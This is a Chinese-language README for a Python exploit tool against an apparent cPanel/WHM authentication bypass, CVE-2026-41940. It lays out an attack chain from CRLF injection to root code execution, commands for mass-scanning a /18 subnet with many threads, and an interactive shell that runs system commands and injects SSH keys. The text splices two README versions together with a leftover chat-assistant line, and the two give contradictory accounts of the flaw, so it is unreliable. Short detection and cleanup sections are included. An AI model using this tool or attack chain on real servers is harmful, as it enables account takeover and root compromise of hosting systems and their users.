anach-ai/CVE-2026-41940

# CVE-2026-41940 — cPanel/WHM 身份验证绕过 **作者：** Dr.Anach | **联系方式：** [@dranach](https://t.me/dranach) | **许可证：** MIT ## 概述 `cpsrvd` Basic 身份验证处理程序中的 CRLF 注入 → 未经身份验证的 WHM API 访问 → 以 root 身份执行远程代码 (RCE)。自 v11.40 以来的所有 cPanel 版本均受影响。 ## 攻击链 | # | 步骤 | 请求 | |---|------|---------| | 1 | 生成会话 | `GET /login/?user=root` | | 2 | CRLF 注入 | `Authorization: Basic ` — 密码包含 `\r\n` 载荷 | | 3 | 缓存提升 | `GET /cpsess/login/?login_only=1` | | 4 | 执行 | `GET /cpsess/execute/API/func` | ## 安装 ``` pip install requests colorama ``` 以下是最终的 `README.md` —— 易于阅读、实用，并专注于高效完成任务。 # cPanel 身份验证绕过漏洞利用 — CVE-2026-41940 **作者：** Dr.Anach · Telegram: [@dranach](https://t.me/dranach) **版本：** 2.0.0 **许可证：** 仅用于授权安全测试 ## 功能介绍 利用 CVE-2026-41940，这是 **cPanel & WHM**（11.x 至 106.x 版本）中的一个身份验证绕过漏洞。该漏洞允许未经身份验证的攻击者通过发送指向受攻击者控制服务器的伪造 `Host` 头，访问受限的端点——包括**密码重置功能**。 提供三种模式： | 模式 | 标志 | 说明 | |------|------|------| | 单一目标 | `-t` | 测试单个 IP 或域名 | | 批量文件 | `--batch` | 从文件加载目标列表 | | CIDR 扫描 | `--port-scan` | 展开子网并测试每个存活主机 | ## 安装说明 ### 前置条件 - **Python 3.7+**（已在 Windows、Linux、macOS 上测试） - `requests` 库 ``` pip install requests ``` **没有其他依赖项。** CIDR 展开使用 Python 的内置 `ipaddress` 模块——在 Windows 上无需额外安装任何内容。 ## 快速入门 ### 测试单个目标 ``` python main.py -t example.com python main.py -t 192.168.1.100 ``` ### 测试目标列表（每行一个） ``` python main.py --batch targets.txt --threads 50 ``` **targets.txt** 格式： ``` 192.168.1.100 example.com 192.168.1.101 example.org 192.168.1.102 ``` ### 扫描整个子网 (CIDR) ``` python main.py --port-scan 192.168.128.0/18 --threads 100 --timeout 5 ``` 这会展开 **192.168.128.0/18**（16,384 个 IP），对每个 IP 进行快速端口检查，并且只对 **2087** 端口 (cPanel/WHM) 开放的主机尝试利用漏洞。 ## 完整选项 ``` -t, --target Single target IP or domain --batch FILE File with targets (one per line) --port-scan CIDR CIDR range to scan (e.g., 192.168.128.0/18) -p, --port Target port (default: 2087) --ssl Use HTTPS (default: HTTP) --timeout SEC Connection timeout in seconds (default: 10) --threads N Max concurrent threads (default: 50) --proxy PROXY HTTP proxy (e.g., http://127.0.0.1:8080) -v, --verbose Verbose output with debug info --no-banner Suppress banner --version Show version ``` ## 理解输出 ``` [+] 192.168.130.45:2087 — VULNERABLE! → Password reset URL: http://192.168.130.45:2087/reset?token=abc123 → Response time: 1.23s [-] 192.168.131.10:2087 — Not vulnerable → Reason: No password reset endpoint found [!] 192.168.129.22:2087 — Error: Connection refused ``` 保存为 JSON 的结果按主机结构化，包含漏洞状态、提取的 token 以及原始响应详情。 ## 实战示例：在 Windows 上扫描 /18 子网 这可能是你最需要的场景： ``` python main.py --port-scan 192.168.128.0/18 -p 2087 --threads 100 --timeout 5 -v ``` **工作原理：** 1. 在内部**展开** `192.168.128.0/18` → 16,384 个 IP 2. 通过对 2087 端口进行快速的 TCP 连接扫描进行**预过滤**（跳过无响应的主机） 3. 仅对端口开放的主机**执行漏洞利用** 4. **报告**带有已提取重置 token 的脆弱主机 **线程提示：** - `--threads 100` 效果很好（遵循默认的 socket 限制） - 对于良好网络连接下更快的扫描：`--threads 200` - 如果遇到速率限制：降低至 `--threads 30` 并增加 `--timeout` ## CVSS 与风险 **CVSS 9.1（严重）** —— 无需身份验证，无需用户交互，复杂度低。 ### 影响 - 对任何 cPanel 账户进行未授权的密码重置 - 完全接管账户 - 在某些配置中，从受限权限提升至管理员权限 ### 修复建议 - 将 cPanel/WHM 更新到最新修补版本 - 在服务器端验证 `Host` 头 - 尽可能通过 IP 限制对 WHM 的访问 ## 法律声明 本工具仅用于**授权的安全评估**。 在测试之前，您必须拥有目标的所有权，或者获得所有者的书面许可。 作者对滥用行为不承担任何责任。 ## 交互式 Shell 命令 ``` help Show commands info Server info passwd Change password accounts List cPanel accounts enum Full enumeration shell Execute system command ssh-add Inject SSH key exec Run Python one-liner exit Exit ``` ## 检测 检查会话文件： ``` ls -la /var/cpanel/sessions/raw/ ls -la /var/cpanel/sessions/cache/ ``` `/usr/local/cpanel/logs/access_log` 中的可疑日志： ``` /login/?user=root → session mint /login/?user=root → CRLF injection /cpsess*/login/?login_only=1 → cache promotion /cpsess*/execute/* → API abuse ``` ## 缓解措施 ``` # 1. Patch 到 fixed build # 2. 轮换所有密码和 SSH keys # 3. 清除 sessions rm -rf /var/cpanel/sessions/raw/* rm -rf /var/cpanel/sessions/cache/* systemctl restart cpanel ``` ## 致谢 - **漏洞发现：** Sina Kheirkhah / watchTowr Labs - **框架：** Dr.Anach ([@dranach](https://t.me/dranach))

标签：0day漏洞, Auth Bypass, CIDR扫描, CISA项目, cPanel, cpsrvd, CRLF注入, CVE-2026-41940, Exploit, HTTP响应拆分, PoC, Python, RCE, Root权限, URL发现, Web安全, WHM, 安全检测, 恶意行为检测, 提权, 数据展示, 无后门, 暴力破解, 未授权访问, 漏洞分析, 红队, 编程工具, 网络安全, 蓝队分析, 路径探测, 身份验证绕过, 远程代码执行, 逆向工具, 隐私保护